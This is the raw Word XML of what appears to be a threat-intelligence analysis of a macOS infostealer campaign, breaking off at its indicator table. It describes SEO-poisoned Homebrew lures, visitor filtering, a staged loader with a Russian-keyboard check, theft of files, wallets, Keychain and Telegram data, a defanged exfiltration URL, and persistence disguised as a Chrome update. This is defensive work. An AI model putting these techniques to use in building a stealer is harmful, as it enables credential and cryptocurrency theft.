    <w:p w14:paraId="77822296" w14:textId="5675D7C4" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:r w:rsidRPr="00E61C8A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01E35D0A" wp14:editId="7D92B6B3">
            <wp:extent cx="5943600" cy="1218565"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="49980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03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D8BD" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="005E4570" w:rsidP="001E1C20">
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="4420BF4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7F18FE6" w14:textId="7A59F458" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="00973837">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc230012190"/>
      <w:r w:rsidRPr="001E1C20">
        <w:t>Analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="592A17BC" w14:textId="749F60C8" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="00973837">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1C20">
        <w:t>Defense Evasion &amp; Delivery Filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDD7571" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:r w:rsidRPr="001E1C20">
        <w:t>The threat actor implements several filtering mechanisms to restrict access to the malicious page and evade automated analysis:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EF4A57" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SEO Poisoning:</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:t> The campaign targets users searching for "brew install free" and similar Homebrew-related keywords via CEO </w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(SEO)</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:t> poisoning, ensuring only relevant victims are served the malicious page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0703C0BA" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Referrer Filtering:</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:t> The malicious page </w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>only accepts connections originating from Google redirects</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:t>, blocking direct access and hindering automated crawlers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3605603C" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>User-Agent Filtering:</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:t> The server checks for a </w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>macOS Safari User-Agent</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:t>, ensuring the payload is only delivered to the intended target platform.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0749AE46" w14:textId="00E860A2" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="00973837">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1C20">
        <w:t>Stage 2 Execution — loader.sh Behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AF6A0E" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:r w:rsidRPr="001E1C20">
        <w:t>Upon execution, loader.sh performs the following actions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54845E85" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Russian Language Check:</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:t> Queries the system's keyboard layout. If Russian is detected, </w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>execution halts immediately</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:t> — a common technique used to avoid infecting systems in the threat actor's likely country of origin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752B006F" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Telemetry Collection:</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:t> Gathers the top 5 configured keyboard layouts and the victim's current public IP address, which are transmitted back to the C2 server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBCA6A7" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Stage 3 Retrieval:</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:t> If the language check passes, the script fetches and executes an osascript payload from a remote location.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1951FF9B" w14:textId="77976283" w:rsidR="001E1C20" w:rsidRPr="00973837" w:rsidRDefault="001E1C20" w:rsidP="00973837">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00973837">
        <w:lastRenderedPageBreak/>
        <w:t>Stage 3 — osascript InfoStealer Behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C793DA" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:r w:rsidRPr="001E1C20">
        <w:t>The final stage is an </w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AppleScript (osascript)-based InfoStealer</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:t> with broad data collection capabilities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78801B63" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:rFonts w:ascii="Apple Color Emoji" w:hAnsi="Apple Color Emoji" w:cs="Apple Color Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📁</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> File Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A79548" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:r w:rsidRPr="001E1C20">
        <w:t>Targets files </w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>smaller than 150MB</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:t> stored under ~/Documents and ~/Desktop with the following extensions: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1C20" w14:paraId="5B7EC5C8" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73D6F694" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001E1C20">
              <w:t>.docx, .doc, .wallet, .key, .keys, .txt, .rtf, .csv,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BC54F43" w14:textId="5E7A3861" w:rsidR="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001E1C20">
              <w:t>.xls, .xlsx, .json, .rdp, .png</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B3580A9" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20"/>
    <w:p w14:paraId="25020C59" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:rFonts w:ascii="Apple Color Emoji" w:hAnsi="Apple Color Emoji" w:cs="Apple Color Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🌐</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Browser Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA069C7" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1C20">
        <w:t>Cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5706E104" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1C20">
        <w:t>Browser history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF33B9B" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1C20">
        <w:t>Specific browser extensions, with a focus on </w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cryptocurrency wallet extensions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37428B64" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:rFonts w:ascii="Apple Color Emoji" w:hAnsi="Apple Color Emoji" w:cs="Apple Color Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>💰</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Cryptocurrency Targeting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEA4C41" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1C20">
        <w:t>Desktop cryptocurrency wallets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7C13AF" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Wallet Injection:</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:t> Malicious .asar and .plist files are planted into directories used by the following wallet applications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0BF1A6" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1C20">
        <w:t>Trezor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6142354F" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1C20">
        <w:t>Exodus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440406E5" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1C20">
        <w:t>Ledger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698947F2" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1C20">
        <w:t>Atomic Wallet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5299F710" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:rFonts w:ascii="Apple Color Emoji" w:hAnsi="Apple Color Emoji" w:cs="Apple Color Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔐</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System &amp; Credential Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A80D15" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1C20">
        <w:t>macOS </w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Keychain</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:t> contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050ACA88" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CloudKeys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A08661A" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Telegram</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:t> application data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F41AABD" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1C20">
        <w:t>macOS </w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Notes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154016D0" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1C20">
        <w:t>System telemetry: IP address, hostname, keyboard layout, OS version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B7F0AB" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:rFonts w:ascii="Apple Color Emoji" w:hAnsi="Apple Color Emoji" w:cs="Apple Color Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>📦</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exfiltration Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6998B86B" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:r w:rsidRPr="001E1C20">
        <w:t>All collected data is </w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>archived into a ZIP file</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:t> 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1C20" w14:paraId="21670ECF" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="229DF906" w14:textId="75B80168" w:rsidR="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001E1C20">
              <w:t>/tmp/shub_log.zip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="73287C9A" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20"/>
    <w:p w14:paraId="33CC71EC" w14:textId="73E3545D" w:rsidR="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:r w:rsidRPr="001E1C20">
        <w:t>And exfiltrated via an </w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP POST request</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:t> 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1C20" w14:paraId="33A733D7" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51E4052B" w14:textId="78CC210F" w:rsidR="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001E1C20">
              <w:t>hxxps://ogromnistol[.]com/api/debug/event</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="686E0E23" w14:textId="42E5D159" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20"/>
    <w:p w14:paraId="0B5B68C1" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="005E4570" w:rsidP="001E1C20">
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="3F7B0D5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CE66B0" w14:textId="1C7E5490" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="00973837">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc230012191"/>
      <w:r w:rsidRPr="001E1C20">
        <w:t>Persistence Mechanism</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="25465F15" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:r w:rsidRPr="001E1C20">
        <w:t>The malware establishes persistence by </w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>masquerading as a legitimate Google Chrome update</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:t>, using the following characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BA66BF" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Execution Trigger:</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:t> Runs every </w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>60 seconds</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:t> and at every </w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>user login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6504771D" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mechanism:</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:t> Decodes a Base64-encoded string to resolve a C2 domain, from which a .sh script is downloaded and executed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775A898B" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anti-Forensics:</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:t> The downloaded script is </w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>deleted immediately after execution</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1C20">
        <w:t>, minimizing on-disk artifacts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675B9CEB" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="005E4570" w:rsidP="001E1C20">
      <w:r w:rsidRPr="001E1C20">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="7040293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9FD423" w14:textId="3BCEAA17" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="00973837">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc230012192"/>
      <w:r w:rsidRPr="001E1C20">
        <w:t>Indicators of Compromise (IOCs)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="4E9A2AB7" w14:textId="49968356" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="00973837">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1C20">
        <w:t>Network IOCs</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="99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9489"/>
      </w:tblGrid>
      <w:tr w:rsidR="001E1C20" w:rsidRPr="001E1C20" w14:paraId="65DFF0B2" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:trPr>
          <w:trHeight w:val="472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B658CD2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1D7FBB3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Indicator</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001E1C20" w:rsidRPr="001E1C20" w14:paraId="6C2B0F4E" w14:textId="77777777" w:rsidTr="001E1C20">
        <w:trPr>
          <w:trHeight w:val="46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B21C15E" w14:textId="77777777" w:rsidR="001E1C20" w:rsidRPr="001E1C20" w:rsidRDefault="001E1C20" w:rsidP="001E1C20">
            <w:r w:rsidRPr="001E1C20">
